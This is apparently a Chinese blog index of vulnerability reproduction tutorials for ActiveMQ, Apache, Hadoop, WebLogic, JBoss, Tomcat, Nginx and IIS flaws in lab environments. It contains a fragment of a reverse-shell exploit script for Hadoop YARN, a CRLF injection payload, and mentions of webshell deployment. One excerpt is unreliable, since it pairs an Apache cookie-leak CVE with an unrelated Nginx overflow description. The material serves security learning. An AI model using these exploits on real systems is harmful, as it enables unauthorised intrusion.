中间件漏洞复现&插件漏洞复现
文章平均质量分 71
中间件插件各种漏洞复现
W小哥1
微信公众号:W小哥
展开
-
ActiveMQ 任意文件写入漏洞 getshell (CVE-2016-3088)——漏洞复现
一、ActiveMQ 漏洞介绍1.1、ActiveMQ 简介ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。fileserver是一个RESTful API接口,我们可以通过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读写操作,其设计目的是为了弥补消息队列操作不能传输、存储二进制文件的缺陷,但后来发现原创 2021-11-11 17:00:14 · 4933 阅读 · 0 评论 -
ActiveMQ反序列化漏洞 getshell(CVE-2015-5254)——漏洞复现
一、ActiveMQ介绍1.1 简介Apache的一款JAVA开源消息中间件,支持Java消息服务、集群、SpringFrameword等。属于消息队列组件。(消息队列组件:分布式系统中的重要组件,主要解决应用耦合、异步消息、流量削峰等)1.2 漏洞影响版本Apache ActiveMQ < 5.13.0 之前 5.x版本1.3 漏洞成因漏洞没有限制在代理中序列化的类,远程攻击者可以借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行恶意代码。1.原创 2021-11-10 11:11:58 · 3750 阅读 · 3 评论 -
Apahce HTTPd 2.4.49(CVE-2021-41773)漏洞复现详细教程
一、漏洞描述Apache HTTP Server 是 Apache 基础开放的流行的 HTTP 服务器。在其 2.4.49 版本中,引入了一个路径体验,满足下面两个条件的 Apache 服务器将受到影响:1、版本等于2.4.492、Require all granted(默认情况下是允许被访问的)。攻击者利用这个漏洞,可以读取到Apache服务器Web目录以外的其他文件,或者读取Web中的脚本源码,或者在开启cgi或cgid的服务器上执行任意命令。二、影响版本Apache HTTP Server原创 2021-10-15 16:40:21 · 9517 阅读 · 1 评论 -
Apahce HTTPd 2.4.49/2.4.50(CVE-2021-42013)漏洞复现详细教程
一、漏洞描述Apache HTTP Server 2.4.50 中对 CVE-2021-41773 的修复不够充分。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置 “要求全部拒绝” 的保护,则这些请求可能会成功。如果还为这些别名路径启用了 CGI 脚本,则可以允许远程代码执行。二、影响版本Apache 2.4.49 和 Apache 2.4.50三、靶场准备本实验使用vulhub环境,节约搭建时间mkdir Docker原创 2021-10-14 17:26:10 · 3684 阅读 · 2 评论 -
Hadoop YARN ResourceManager 未授权访问
一环境搭建二、漏洞复现环境启动后,访问http://192.168.120.129:8088即可看到Hadoop YARN ResourceManager WebUI页面。使用exp反弹shell#!/usr/bin/env pythonimport requeststarget = 'http://192.168.120.129:8088/' #目标地址lhost = '192.168.120.1' # put your local host ip here, and listen原创 2020-12-16 16:35:42 · 1998 阅读 · 0 评论 -
PHP-FPM远程命令执行(CVE-2019-11043)getshell——漏洞复现
一、漏洞原理漏洞主要由于 PHP-FPM 中 sapi/ fpm/ fpm/ fpm_main.c 文件内的 env_path_info 下溢导致,攻击者可以使用换行符 %0a 破坏 Nginx 中 fastcgi_split_path_info 对应的正则表达式,导致传递给 PHP-FPM 的 PATH_INFO 值为空,从而触发该漏洞,通过发送特制的URL请求,在一些特殊的配置情况下会导致任意代码执行。(当nginx配置不当时,会导致php-fpm远程任意代码执行。)二、环境搭建使用vulhub搭原创 2020-12-16 15:48:55 · 877 阅读 · 0 评论 -
Weblogic WLS Core Components 反序列化命令执行漏洞GetShell(CVE-2018-2628)——漏洞复现
一、漏洞描述影响版本:Oracle WebLogic Server10.3.6.0Oracle WebLogic Server12.2.1.2Oracle WebLogic Server12.2.1.3Oracle WebLogic Server12.1.3.0二、漏洞原理Oracle 2018年4月补丁中,修复了Weblogic Server WLS Core Components中出现的一个反序列化漏洞(CVE-2018-2628),该漏洞通过t3协议触发,可导致未授权的用户在远程服务器执原创 2020-12-01 17:44:44 · 809 阅读 · 0 评论 -
WordPress插件SQL注入漏洞——漏洞复现
复现过程环境地址:https://www.mozhe.cn/bug/detail/S0JTL0F4RE1sY2hGdHdwcUJ6aUFCQT09bW96aGUmozhe访问目标网站常规工具AWVS扫描是扫不出来漏洞的第一步识别CMSvulnx -u http://219.153.49.228:47712/ --cmswpscan --url http://219.153.49.228:47712/给API的token才能将结果输出...原创 2020-11-25 14:34:07 · 8736 阅读 · 1 评论 -
Jboss 未授权访问漏洞getshell漏洞复现
一、漏洞描述未授权访问管理控制台,通过该漏洞,可以后台管理服务,可以通过脚本命令执行系统命令,如反弹shell,wget写webshell文件。二、环境搭建利用vulhub的CVE-2017-7504环境三、漏洞复现原创 2020-11-24 14:44:07 · 1867 阅读 · 0 评论 -
vulhub——shiro反序列化getshell漏洞复现
一、漏洞概述Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。二、环境搭建三、漏洞复现访问目标网站,使用admin:vulhub进行登录输入用户名、密码进行登录,开启burpsu原创 2020-11-24 13:07:40 · 6011 阅读 · 6 评论 -
Apache httpOnly Cookie泄露( CVE-2012-0053)——漏洞复现
一、漏洞描述二、漏洞原理在1.4.7之前的nginx 1.3.15和1.5.12之前的1.5.x中的SPDY实现中,基于堆的缓冲区溢出允许远程攻击者通过精心设计的请求执行任意代码。三、环境搭建四、漏洞复现五、漏洞修复...原创 2020-06-16 11:54:32 · 2971 阅读 · 2 评论 -
Weblogic wls-wsat XMLDecoder 反序列化漏洞复现(CVE-2017-10271)
一、漏洞描述受影响WebLogic版本:10.3.6.0.0,12.1.3.0.0,12.2.1.1.0,12.2.1.2.0。二、漏洞原理Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。三、环境搭建四、漏洞复现访问http://your-ip:7001/即可看到一个404页面,说明weblogic已成功启动。用检查工具检测一下,发现存在漏洞发送原创 2020-06-05 11:21:45 · 787 阅读 · 0 评论 -
JBoss 4.x JBossMQ JMS 反序列化漏洞复现(CVE-2017-7504)
一、漏洞描述JBoss <=4.x二、漏洞原理Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。三、环境搭建四、漏洞复现访问目标网站五、漏洞修复...原创 2020-06-05 10:23:20 · 883 阅读 · 0 评论 -
JBoss 5.x/6.x 反序列化漏洞复现(CVE-2017-12149)
一、漏洞描述该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。二、漏洞原理该漏洞出现在/invoker/readonly请求中,服务器将用户提交的POST内容进行了Java反序列化:三、环境搭建四、漏洞复现访问目标网站检测方法一:使用工具检测检测方法二:访问 /invoker/readonly原创 2020-05-26 16:53:28 · 398 阅读 · 0 评论 -
JBoss JMXInvokerServlet 反序列化漏洞复现
一、漏洞描述影响范围JBoss Enterprise Application Platform 6.4.4,5.2.0,4.3.0_CP10JBoss AS (Wildly) 6 and earlierJBoss A-MQ 6.2.0JBoss Fuse 6.2.0JBoss SOA Platform (SOA-P) 5.3.1JBoss Data Grid (JDG) 6.5.0JBoss BRMS (BRMS) 6.1.0JBoss BPMS (BPMS) 6.1.0JBoss Da原创 2020-05-26 16:30:20 · 1813 阅读 · 0 评论 -
Vulhub Tomcat弱口令getshell漏洞复现
一、漏洞描述若空灵二、漏洞原理Tomcat支持通过后端部署war文件,因此我们可以直接将webshell放置在web目录中。为了访问后端,需要权限。后台管理manager-gui (permission of html pages)manager-status (permission to view status)manager-script (permission of text interface and the status permission)manager-jmx (jmx原创 2020-05-26 14:56:59 · 1505 阅读 · 0 评论 -
Tomcat PUT方法任意写入文件漏洞复现(CVE-2017-12615)
一、漏洞描述影响版本:Apache Tomcat 7.0.0-7.0.81二、漏洞原理Tomcat设置了写许可权(readonly = false),这导致我们可以将文件写到服务器中。<servlet> <servlet-name>default</servlet-name> <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>原创 2020-05-21 14:07:48 · 1035 阅读 · 0 评论 -
Nginx越界读取缓存漏洞复现(CVE-2017-7529)
一、漏洞描述影响版本Nginx version 0.5.6 - 1.13.2修复版本Nginx version 1.13.3, 1.12.1二、漏洞原理Nginx在反向代理站点的时候,通常会将一些文件进行缓存,特别是静态文件。缓存的部分存储在文件中,每个缓存文件包括“文件头”+“HTTP返回包头”+“HTTP返回包体”。如果二次请求命中了该缓存文件,则Nginx会直接将该文件中的“HTTP返回包体”返回给用户。如果我的请求中包含Range头,Nginx将会根据我指定的start和end位置,返原创 2020-05-21 13:46:00 · 632 阅读 · 0 评论 -
Nginx 文件名逻辑漏洞复现(CVE-2013-4547)
一、漏洞描述影响版本:Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7二、漏洞原理这个漏洞其实和代码执行没有太大关系,其主要原因是错误地解析了请求的URL,错误地获取到用户请求的文件名,导致出现权限绕过、代码执行的连带影响。举个例子,比如,Nginx匹配到.php结尾的请求,就发送给fastcgi进行解析,常见的写法如下:location ~ .php$ {include fastcgi_params;fastcgi_pass 127.0.0.1:90原创 2020-05-21 13:14:48 · 686 阅读 · 0 评论 -
Nginx 配置错误导致漏洞(add_header被覆盖)——漏洞复现
一、漏洞描述Nginx配置文件子块(server、location、if)中的add_header,将会覆盖父块中的add_header添加的HTTP头,造成一些安全隐患。二、漏洞原理如下列代码,整站(父块中)添加了CSP头:add_header Content-Security-Policy "default-src 'self'";add_header X-Frame-Options DENY;location = /test1 { rewrite ^(.*)$ /xss.html原创 2020-05-20 13:41:51 · 1740 阅读 · 0 评论 -
Nginx 配置错误导致漏洞(目录遍历漏洞)——漏洞复现
一、漏洞描述Nginx在配置别名(Alias)的时候,如果忘记加/,将造成一个目录穿越漏洞。二、漏洞原理1、 修改nginx.conf,在如下图位置添加如下配置在如下配置中设置目录别名时/files配置为/home/的别名,那么当我们访问/files…/时,nginx实际处理的路径时/home/…/,从而实现了穿越目录。三、环境搭建四、漏洞复现五、漏洞防御...原创 2020-05-20 13:08:14 · 3767 阅读 · 0 评论 -
Nginx 配置错误导致漏洞(CRLF注入漏洞)——漏洞复现
一、环境搭建运行成功后,Nginx将会监听8080/8081/8082三个端口,分别对应三种漏洞。二、漏洞复现1.CRLF注入漏洞Nginx会将$uri进行解码,导致传入%0a%0d即可引入换行符,造成CRLF注入漏洞。错误的配置文件示例(原本的目的是为了让http的请求跳转到https上):location / {return 302 https://hosthosthosturi;}Payload: http://your-ip:8080/%0a%0dSet-Cookie:%20a=原创 2020-05-20 12:56:59 · 2050 阅读 · 1 评论 -
Nginx配置文件错误导致的解析漏洞——漏洞复现
一、漏洞描述对于任意文件名,在后面添加/xxx.php(xxx为任意字符)后,即可将文件作为php解析。例:info.jpg后面加上/xxx.php,会将info.jpg 以php解析。该漏洞是Nginx配置所导致,与Nginx版本无关二、漏洞环境搭建环境路径三、漏洞复现查看目标服务器的图片漏洞验证四、修复建议配置cgi.fix_pathinfo(php.ini中)为0...原创 2020-04-24 17:04:40 · 722 阅读 · 0 评论 -
Apache HTTPD 换行解析漏洞(CVE-2017-15715)——漏洞复现
一、漏洞描述Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。二、漏洞环境编译及运行漏洞环境:...原创 2020-04-24 16:41:40 · 1753 阅读 · 0 评论 -
IIS_CVE-2017-7269 IIS6.0远程代码执行漏洞复现——踩坑记
一、漏洞描述IIS 6.0默认不开启WebDAV,一旦开启了WebDAV,安装了IIS6.0的服务器将可能受到该漏洞的威胁。二、影响版本以及利用条件Windows 2003 R2开启WebDAV服务的IIS6.0三、漏洞环境搭建Windows server 2003 R2 安装IIS服务,并且开启了WebDAVExp下载地址:https://github.com/zcgonvh/cve...原创 2020-04-24 14:14:42 · 2413 阅读 · 0 评论 -
CVE-2015-1635-HTTP.SYS远程执行代码漏洞复现
一、漏洞描述远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。 成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。攻击者只需要发送恶意的http请求数据包,就可能远程读取IIS服务器的内存数据,或使服务器系统蓝屏崩溃。微软官方说明:https://docs.microsoft.com/z...原创 2020-04-20 21:44:19 · 7924 阅读 · 0 评论